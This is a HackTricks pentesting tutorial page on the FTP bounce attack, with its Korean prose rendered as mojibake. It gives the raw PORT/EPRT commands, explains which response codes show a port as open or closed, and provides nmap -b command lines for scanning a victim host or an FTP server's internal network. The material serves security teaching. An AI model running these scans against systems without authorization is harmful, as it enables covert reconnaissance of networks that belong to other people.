FTP Bounce attack - Scan

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

FTP Bounce - Scanning

Manual

  1. ์ทจ์•ฝํ•œ FTP์— ์—ฐ๊ฒฐํ•ฉ๋‹ˆ๋‹ค.
  2. PORT ๋˜๋Š” EPRT(๋‘˜ ์ค‘ ํ•˜๋‚˜๋งŒ ์‚ฌ์šฉ) ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์Šค์บ”ํ•˜๋ ค๋Š” _<IP:Port>_์™€ ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•ฉ๋‹ˆ๋‹ค:

PORT 172,32,80,80,0,8080
EPRT |2|172.32.80.80|8080|

  1. LIST ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค(์ด ๋ช…๋ น์–ด๋Š” ์—ฐ๊ฒฐ๋œ _<IP:Port>_์— FTP ํด๋”์˜ ํ˜„์žฌ ํŒŒ์ผ ๋ชฉ๋ก์„ ์ „์†กํ•ฉ๋‹ˆ๋‹ค) ๊ทธ๋ฆฌ๊ณ  ๊ฐ€๋Šฅํ•œ ์‘๋‹ต์„ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค: 150 File status okay (์ด๊ฒƒ์€ ํฌํŠธ๊ฐ€ ์—ด๋ ค ์žˆ์Œ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค) ๋˜๋Š” 425 No connection established (์ด๊ฒƒ์€ ํฌํŠธ๊ฐ€ ๋‹ซํ˜€ ์žˆ์Œ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค)
  2. LIST ๋Œ€์‹  **RETR /file/in/ftp**๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์œ ์‚ฌํ•œ Open/Close ์‘๋‹ต์„ ์ฐพ์„ ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

PORT๋ฅผ ์‚ฌ์šฉํ•œ ์˜ˆ์‹œ(172.32.80.80์˜ ํฌํŠธ 8080์€ ์—ด๋ ค ์žˆ๊ณ  ํฌํŠธ 7777์€ ๋‹ซํ˜€ ์žˆ์Œ):

**EPRT**๋ฅผ ์‚ฌ์šฉํ•œ ๋™์ผํ•œ ์˜ˆ์‹œ(์ธ์ฆ์€ ์ด๋ฏธ์ง€์—์„œ ์ƒ๋žต๋จ):

LIST ๋Œ€์‹  EPRT๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์—ด๋ฆฐ ํฌํŠธ(๋‹ค๋ฅธ ํ™˜๊ฒฝ):

nmap

nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ